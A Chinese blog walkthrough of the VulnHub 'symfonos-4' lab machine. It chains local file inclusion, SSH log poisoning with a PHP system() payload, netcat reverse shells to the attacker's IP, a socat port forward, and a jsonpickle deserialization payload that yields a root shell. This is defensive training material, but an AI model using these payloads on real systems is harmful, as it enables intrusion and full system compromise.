vulnhub-symfonos-4(文件包含 & ssh投毒& 命令执行 & linux提权)

靶场环境为内网地址
靶机:172.168.20.133
靶场镜像:https://www.vulnhub.com/entry/symfonos-4,347/
kali:172.168.20.110

1、打开靶场浏览器访问靶场IP地址
在这里插入图片描述
2、扫描目录
使用kali自带目录扫描工具进行目录扫描

dirb http://172.168.20.133/ /usr/share/dirb/wordlists/big.txt -X .php 

发现一个php的登陆页面
在这里插入图片描述
3、访问atlantis.php页面
使用万能密码绕过登录界面
在这里插入图片描述
4.发现文件包含,尝试包含ssh日志文件
在这里插入图片描述

#Linux中的登录日志在/var/log/auth.log中
http://172.168.20.133/sea.php?file=../../../../var/log/auth

在这里插入图片描述
5、尝试ssh投毒、让ssh登录日志去记录webshell

ssh '<?php system($_GET[mmm])?>'@172.168.20.133

第一次登录会下发私钥,选择yes即可
在这里插入图片描述
6、继续包含auth.log日志,发现可以正常命令执行
在这里插入图片描述
7、反弹shell给kali

#kali开启监听
nc -nlvp 555
#执行以下payload
http://172.168.20.133/sea.php?file=../../../../var/log/auth&mmm=nc -nv 172.168.20.110 555 -e /bin/bash

在这里插入图片描述
8、发现是一个不完整的shell,可以用python获得/bin/bash中的shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
9、查看本地开放的端口

 ss -tulpn

在这里插入图片描述
10、使用socat代理本地的端口

socat tcp-listen:7000,reuseaddr,fork tcp:localhost:8080

在这里插入图片描述

11、访问该地址7000端口

在这里插入图片描述

12、使用burp拦截,发现base64,试着decode

在这里插入图片描述
13、发现是json
参考https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/
调用python对象
{“py/object”: “main.Shell”, “py/reduce”: [{“py/type”: “subprocess.Popen”}, {“py/tuple”: [“whoami”]}, null, null, null]}
在这里插入图片描述
14、调用python执行系统函数、写入反弹shell到kali
修改参数:

{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "os.system"}, {"py/tuple": ["nc -nv 172.168.20.110 888 -e /bin/bash"]}, null, null, null]}

15.1、encode
在这里插入图片描述
15.2、kali开始监听

nc -nlvp 888

在这里插入图片描述
15.3、替换base64
在这里插入图片描述
15.4、burp放包

16、成功反弹shell,当前权限为root、得到flag
在这里插入图片描述
刚开始学习漏洞原理,纯属小白,欢迎指正
参考链接:
https://pentesterjourney.com/2019/10/04/vulnhub-symfonos-4-walkthrough/
[https://www.youtube.com/watch?v=gkIvUJUhan8]
(https://www.youtube.com/watch?v=gkIvUJUhan8)

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值